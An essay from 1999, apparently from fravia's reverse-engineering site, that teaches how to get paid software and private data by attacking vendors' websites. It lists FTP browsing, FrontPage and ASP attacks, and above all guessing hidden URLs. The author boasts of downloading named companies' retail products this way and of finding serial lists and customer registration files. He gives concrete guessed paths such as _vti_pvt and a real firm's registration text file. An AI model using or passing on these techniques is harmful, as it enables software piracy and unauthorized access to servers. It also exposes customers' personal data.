The Art of Guessing
Smut sites busting
by .sozni
courtesy of fravia's pages of reverse engineering
(published at fravia's in October 1999, taken from sozni's page)
The Art of Guessing
There are many ways to get registered software. You can buy it, you can get a
copy from a friend or from the internet, you can crack a demo, you can use a serial
number, etc. There are so many ways that if you really want something, you can get
it.
I have noticed that many ActiveX controls are updated frequently. For example,
DataDynamics has been posting a new update for ActiveReports every two weeks. If you
get a pirated copy or a patch, then you never really have the most recent version.
That's why I prefer licensing my software. And that's what my essays are
about: licensing, not cracking software.
I have already talked about a couple of ways to get licensed. There is another way
that I am starting to use more and more. That is to hack the company's web site.
There are may ways to find info on the company's website. Here are some methods that
I use:
- Browse their FTP site looking for hidden directories
- Browse their FTP site looking for stuff out in the open that they have forgotten
about
- Use a FrontPage attack (there are many)
- Exploit weaknesses in Active Server Pages
- View the source of pages (especially registering and purchasing online pages)
- And my favorite: Guessing
I can't believe how many sites I have hacked just by guessing stuff. As I mentioned
before I got all of the Winternals Software just by guessing the URL's. I got a
password for a protoview install by typing random keys (I heard someone else had done the
same thing). I have found serial number lists, serial number generators and
validators, and user registrations.
It's all there for the taking. The trick is to be really good at guessing. The
principle here is that people are predictable. If someone thinks a certain way one
day, most likely they are going to think the same way the next day. Also, people are
usually going to name things with the first thing that comes to mind.
For example, if you wanted to created a directory for downloads, what would you call that
directory? And then if you have one directory for demos, what would you call the
directory for retail products?
Do see my point? The Amazing Kreskin works on this principle. He asks people
to think of a vegetable and most people will think of a carrot. He asks them to
think of a shape then to think of another shape inside that shape and most of the time he
knows what they are thinking. Why? Because people are predictable.
How many new computer users do you think use their logon as their password? Many.
And why do you think there are so many common password lists on hacking sites?
Because a lot of people use these common passwords. See? They are
predictable.
Now if a company has a product named ERD Commander and the information about that product
is on a page called erdcmndr.htm and the demo is named
erdcmndr.exe in the demos directory then what do you think the real product is going to be
called? Yep, erdcmndr.exe (in a different directory, of course).
To get the real version of ERD Commander I looked at the demo at www.sysinternals.com then
went to their retail site, www.winternals.com and
downloaded erdcmdr.exe. Of course, I first had to find the download directory, but
that's another story.
And guess what? I just repeated that same process for all of their products.
Remember what I said? If someone thinks a certain way one day, most likely
they are going to think the same way the next day. People are predictable.
Here's another one: Suppose a company has a wep page that allows you to register
their software online. It is called regonline.htm. And let's suppose they are
using IIS on Windows NT. And let's suppose they want all these online registrations
to be saved to a text file. What would that file be named and where would it be
located? These would be my first guesses for www.company.com/regonline.htm:
www.company.com/regonline.txt
www.company.com/_private/regonline.txt
www.company.com/_vti_pvt/regonline.txt
Here's another one, Janus Systems has a page to register online in the
http://www.janusys.com/Support/ directory. These registrations post to a
text file. Now if your customers were registering their software and these
registrations post to a text file and your company is in Mexico,
what would you call this text file?
My guesses would be:
www.janusys.com/support/registration.txt
www.janusys.com/support/register.txt
www.janusys.com/support/registracion.txt
www.janusys.com/support/registra.txt
And you know what? It's the last one (at least it used to be before I first posted this
essay on my mailing list)
The key to guessing is research. Look around at their website and see what they name
things and where they put things. Look at pictures and links and downloads. Do
they like cryptic abbreviations? Is there a method that uses the product version number?
Do you see patterns?
Then, just guess. You would be surprised how many times this works. That is,
if you have really mastered the art of guessing.
|